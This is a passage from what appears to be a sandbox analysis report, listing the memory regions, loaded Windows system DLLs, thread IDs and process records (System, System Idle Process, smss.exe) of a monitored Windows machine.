0x165ffff entry_point = 0x0 region_type = private name = "private_0x0000000001620000" filename = "" Region: id = 36243 start_va = 0x1660000 end_va = 0x16ebfff entry_point = 0x0 region_type = private name = "private_0x0000000001660000" filename = "" Region: id = 36244 start_va = 0x1720000 end_va = 0x175ffff entry_point = 0x0 region_type = private name = "private_0x0000000001720000" filename = "" Region: id = 36245 start_va = 0x17a0000 end_va = 0x17affff entry_point = 0x0 region_type = private name = "private_0x00000000017a0000" filename = "" Region: id = 36246 start_va = 0x17c0000 end_va = 0x17cffff entry_point = 0x0 region_type = private name = "private_0x00000000017c0000" filename = "" Region: id = 36247 start_va = 0x17d0000 end_va = 0x18cffff entry_point = 0x0 region_type = private name = "private_0x00000000017d0000" filename = "" Region: id = 36248 start_va = 0x18e0000 end_va = 0x191ffff entry_point = 0x0 region_type = private name = "private_0x00000000018e0000" filename = "" Region: id = 36249 start_va = 0x1990000 end_va = 0x199ffff entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 36250 start_va = 0x19a0000 end_va = 0x1a9ffff entry_point = 0x0 region_type = private name = "private_0x00000000019a0000" filename = "" Region: id = 36251 start_va = 0x1aa0000 end_va = 0x1e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001aa0000" filename = "" Region: id = 36252 start_va = 0x1f00000 end_va = 0x1ffffff entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 36253 start_va = 0x2000000 end_va = 0x2100fff entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 36254 start_va = 0x2520000 end_va = 0x271ffff entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 36255 start_va = 0x2720000 end_va = 0x2b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 36256 start_va = 0x2b20000 end_va = 0x331ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b20000" filename = "" Region: id = 36257 start_va = 0x3320000 end_va = 0x42effff entry_point = 0x0 region_type = private name = "private_0x0000000003320000" filename = "" Region: id = 36258 start_va = 0x6e4f0000 end_va = 0x6e4f9fff entry_point = 0x6e4f0000 region_type = mapped_file name = "apphlpdm.dll" filename = "\\Windows\\System32\\Apphlpdm.dll" (normalized: "c:\\windows\\system32\\apphlpdm.dll") Region: id = 36259 start_va = 0x6e540000 end_va = 0x6e551fff entry_point = 0x6e540000 region_type = mapped_file name = "portabledeviceconnectapi.dll" filename = "\\Windows\\System32\\PortableDeviceConnectApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceconnectapi.dll") Region: id = 36260 start_va = 0x6e670000 end_va = 0x6e6f8fff entry_point = 0x6e670000 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 36261 start_va = 0x6e900000 end_va = 0x6e949fff entry_point = 0x6e900000 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 36262 start_va = 0x6eb70000 end_va = 0x6ebd6fff entry_point = 0x6eb70000 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 36263 start_va = 0x6ebe0000 end_va = 0x6ebe9fff entry_point = 0x6ebe0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 36264 start_va = 0x6ebf0000 end_va = 0x6ec07fff entry_point = 0x6ebf0000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 36265 start_va = 0x6ec10000 end_va = 0x6eca5fff entry_point = 0x6ec10000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 36266 start_va = 0x6ef00000 end_va = 0x6ef0efff entry_point = 0x6ef00000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 36267 start_va = 0x6f290000 end_va = 0x6f2f0fff entry_point = 0x6f290000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 36268 start_va = 0x6f7c0000 end_va = 0x6f81bfff entry_point = 0x6f7c0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 36269 start_va = 0x6fb90000 end_va = 0x6fba4fff entry_point = 0x6fb90000 region_type = mapped_file name = "trkwks.dll" filename = "\\Windows\\System32\\trkwks.dll" (normalized: "c:\\windows\\system32\\trkwks.dll") Region: id = 36270 start_va = 0x6fbc0000 end_va = 0x6fcddfff entry_point = 0x6fbc0000 region_type = mapped_file name = "sysmain.dll" filename = "\\Windows\\System32\\sysmain.dll" (normalized: "c:\\windows\\system32\\sysmain.dll") Region: id = 36271 start_va = 0x6fff0000 end_va = 0x70004fff entry_point = 0x6fff0000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 36272 start_va = 0x718b0000 end_va = 0x718fbfff entry_point = 0x718b0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 36273 start_va = 0x724e0000 end_va = 0x72504fff entry_point = 0x724e0000 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 36274 start_va = 0x725f0000 end_va = 0x72604fff entry_point = 0x725f0000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 36275 start_va = 0x72610000 end_va = 0x72661fff entry_point = 0x72610000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 36276 start_va = 0x72670000 end_va = 0x72698fff entry_point = 0x72670000 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 36277 start_va = 0x726a0000 end_va = 0x72760fff entry_point = 0x726a0000 region_type = mapped_file name = "rasdlg.dll" filename = "\\Windows\\System32\\rasdlg.dll" (normalized: "c:\\windows\\system32\\rasdlg.dll") Region: id = 36278 start_va = 0x72770000 end_va = 0x727b6fff entry_point = 0x72770000 region_type = mapped_file name = "netman.dll" filename = "\\Windows\\System32\\netman.dll" (normalized: "c:\\windows\\system32\\netman.dll") Region: id = 36279 start_va = 0x729e0000 end_va = 0x72c44fff entry_point = 0x729e0000 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 36280 start_va = 0x73390000 end_va = 0x7339cfff entry_point = 0x73390000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 36281 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 36282 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 36283 start_va = 0x73800000 end_va = 0x7380afff entry_point = 0x73800000 region_type = mapped_file name = "uxsms.dll" filename = "\\Windows\\System32\\uxsms.dll" (normalized: "c:\\windows\\system32\\uxsms.dll") Region: id = 36284 start_va = 0x73870000 end_va = 0x73879fff entry_point = 0x73870000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 36285 start_va = 0x73880000 end_va = 0x73888fff entry_point = 0x73880000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 36286 start_va = 0x738a0000 end_va = 0x738b3fff entry_point = 0x738a0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 36287 start_va = 0x738f0000 end_va = 0x738fffff entry_point = 0x738f0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 36288 start_va = 0x739a0000 end_va = 0x739d4fff entry_point = 0x739a0000 region_type = mapped_file name = "mstask.dll" filename = "\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll") Region: id = 36289 start_va = 0x739e0000 end_va = 0x73a5cfff entry_point = 0x739e0000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 36290 start_va = 0x73a60000 end_va = 0x73a84fff entry_point = 0x73a60000 region_type = mapped_file name = "peerdist.dll" filename = "\\Windows\\System32\\PeerDist.dll" (normalized: "c:\\windows\\system32\\peerdist.dll") Region: id = 36291 start_va = 0x73a90000 end_va = 0x73b17fff entry_point = 0x73a90000 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 36292 start_va = 0x73b40000 end_va = 0x73b46fff entry_point = 0x73b40000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 36293 start_va = 0x73b50000 end_va = 0x73b74fff entry_point = 0x73b50000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 36294 start_va = 0x73b80000 end_va = 0x73bf9fff entry_point = 0x73b80000 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 36295 start_va = 0x73c00000 end_va = 0x73c20fff entry_point = 0x73c00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 36296 start_va = 0x73d60000 end_va = 0x73d6cfff entry_point = 0x73d60000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 36297 start_va = 0x73ed0000 end_va = 0x73f08fff entry_point = 0x73ed0000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 36298 start_va = 0x74220000 end_va = 0x74314fff entry_point = 0x74220000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 36299 start_va = 0x74360000 end_va = 0x744fdfff entry_point = 0x74360000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 36300 start_va = 0x749e0000 end_va = 0x749eafff entry_point = 0x749e0000 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 36301 start_va = 0x74a10000 end_va = 0x74a25fff entry_point = 0x74a10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 36302 start_va = 0x74a30000 end_va = 0x74a46fff entry_point = 0x74a30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 36303 start_va = 0x74b20000 end_va = 0x74b27fff entry_point = 0x74b20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 36304 start_va = 0x74bd0000 end_va = 0x74bddfff entry_point = 0x74bd0000 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 36305 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 36306 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 36307 start_va = 0x74fe0000 end_va = 0x74ffafff entry_point = 0x74fe0000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 36308 start_va = 0x75290000 end_va = 0x75297fff entry_point = 0x75290000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 36309 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 36310 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 36311 start_va = 0x75340000 end_va = 0x75368fff entry_point = 0x75340000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 36312 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 36313 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 36314 start_va = 0x753f0000 end_va = 0x753fbfff entry_point = 0x753f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 36315 start_va = 0x75400000 end_va = 0x75411fff entry_point = 0x75400000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 36316 start_va = 0x75420000 end_va = 0x7553cfff entry_point = 0x75420000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 36317 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 36318 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x75590000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 36319 start_va = 0x75650000 end_va = 0x7567cfff entry_point = 0x75650000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 36320 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 36321 start_va = 0x75730000 end_va = 0x75774fff entry_point = 0x75730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 36322 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 36323 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 36324 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 36325 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 36326 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 36327 start_va = 0x764b0000 end_va = 0x7664cfff entry_point = 0x764b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 36328 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 36329 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 36330 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 36331 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 36332 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 36333 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 36334 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 36335 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 36336 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 36337 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36338 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 36339 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 36340 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 36341 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36342 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 36343 start_va = 0x7ffa4000 end_va = 0x7ffa4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa4000" filename = "" Region: id = 36344 start_va = 0x7ffa7000 end_va = 0x7ffa7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa7000" filename = "" Region: id = 36345 start_va = 0x7ffa8000 end_va = 0x7ffa8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa8000" filename = "" Region: id = 36346 start_va = 0x7ffa9000 end_va = 0x7ffa9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 36347 start_va = 0x7ffaa000 end_va = 0x7ffaafff entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 36348 start_va = 0x7ffab000 end_va = 0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 36349 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 36350 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 36351 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36352 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 36353 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 36354 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 36355 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 36356 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 36357 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 36358 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 36359 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 36360 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 36361 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 36362 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 36363 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 915 os_tid = 0x48c Thread: id = 916 os_tid = 0x274 Thread: id = 917 os_tid = 0x6e8 Thread: id = 918 os_tid = 0x7b0 Thread: id = 919 os_tid = 0x668 Thread: id = 920 os_tid = 0x420 Thread: id = 921 os_tid = 0x3fc Thread: id = 922 os_tid = 0x3e0 Thread: id = 923 os_tid = 0x3d4 Thread: id = 924 os_tid = 0x3d0 Thread: id = 925 os_tid = 0x3c0 Thread: id = 926 os_tid = 0x3bc Thread: id = 927 os_tid = 0x384 Thread: id = 928 os_tid = 0x380 Thread: id = 929 os_tid = 0x36c Thread: id = 930 os_tid = 0x368 Thread: id = 931 os_tid = 0x350 Thread: id = 932 os_tid = 0x338 Thread: id = 933 os_tid = 0x334 Thread: id = 938 os_tid = 0xec4 Thread: id = 947 os_tid = 0xff4 Process: id = "657" image_name = "System" filename = "" page_root = "0x185000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "kernel_analysis" parent_id = "0" os_parent_pid = "0x0" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36412 start_va = 0x10000 end_va = 0x32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Thread: id = 953 os_tid = 0x8 Thread: id = 954 os_tid = 0x14 Thread: id = 955 os_tid = 0x10 Thread: id = 956 os_tid = 0xc Thread: id = 957 os_tid = 0x18 Thread: id = 958 os_tid = 0x1c Thread: id = 959 os_tid = 0x20 Thread: id = 960 os_tid = 0x24 Thread: id = 961 os_tid = 0x28 Thread: id = 962 os_tid = 0x2c Thread: id = 963 os_tid = 0x30 Thread: id = 964 os_tid = 0x34 Thread: id = 965 os_tid = 0x38 Thread: id = 966 os_tid = 0x3c Thread: id = 967 os_tid = 0x40 Thread: id = 968 os_tid = 0x44 Thread: id = 969 os_tid = 0x48 Thread: id = 970 os_tid = 0x74 Thread: id = 971 os_tid = 0x4c Thread: id = 972 os_tid = 0x50 Thread: id = 973 os_tid = 0x54 Thread: id = 974 os_tid = 0x58 Thread: id = 975 os_tid = 0x5c Thread: id = 976 os_tid = 0x60 Thread: id = 977 os_tid = 0x64 Thread: id = 978 os_tid = 0x68 Thread: id = 979 os_tid = 0x6c Thread: id = 980 os_tid = 0x70 Thread: id = 981 os_tid = 0x78 Thread: id = 982 os_tid = 0x7c Thread: id = 983 os_tid = 0x80 Thread: id = 984 os_tid = 0x84 Thread: id = 985 os_tid = 0x88 Thread: id = 986 os_tid = 0x8c Thread: id = 987 os_tid = 0x90 Thread: id = 988 os_tid = 0x94 Thread: id = 989 os_tid = 0x98 Thread: id = 990 os_tid = 0x9c Thread: id = 991 os_tid = 0xa0 Thread: id = 992 os_tid = 0xa4 Thread: id = 993 os_tid = 0xa8 Thread: id = 994 os_tid = 0xac Thread: id = 995 os_tid = 0xb0 Thread: id = 996 os_tid = 0xb4 Thread: id = 997 os_tid = 0xb8 Thread: id = 998 os_tid = 0xbc Thread: id = 999 os_tid = 0xc0 Thread: id = 1000 os_tid = 0xc4 Thread: id = 1001 os_tid = 0xc8 Thread: id = 1002 os_tid = 0xcc Thread: id = 1004 os_tid = 0xd0 Thread: id = 1005 os_tid = 0xd4 Thread: id = 1006 os_tid = 0xd8 Thread: id = 1007 os_tid = 0xdc Thread: id = 1011 os_tid = 0xf4 Thread: id = 1012 os_tid = 0xf8 Thread: id = 1013 os_tid = 0xfc Thread: id = 1014 os_tid = 0x100 Thread: id = 1015 os_tid = 0x104 Thread: id = 1016 os_tid = 0x108 Thread: id = 1017 os_tid = 0x10c Thread: id = 1018 os_tid = 0x110 Thread: id = 1019 os_tid = 0x114 Thread: id = 1020 os_tid = 0x118 Thread: id = 1021 os_tid = 0x11c Thread: id = 1022 os_tid = 0x120 Thread: id = 1026 os_tid = 0x138 Thread: id = 1027 os_tid = 0x13c Thread: id = 1028 os_tid = 0x140 Thread: id = 1029 os_tid = 0x144 Thread: id = 1049 os_tid = 0x198 Thread: id = 1098 os_tid = 0x278 Thread: id = 1127 os_tid = 0x2f4 Thread: id = 1175 os_tid = 0x3c4 Thread: id = 1176 os_tid = 0x3c8 Thread: id = 1218 os_tid = 0x47c Process: id = "658" image_name = "System Idle Process" filename = "" page_root = "0x185000" os_pid = "0x0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "kernel_analysis" parent_id = "0" os_parent_pid = "0x0" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 1003 os_tid = 0x0 Process: id = "659" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x7f1d1020" os_pid = "0xe0" os_integrity_level = "0x4000" os_privileges = 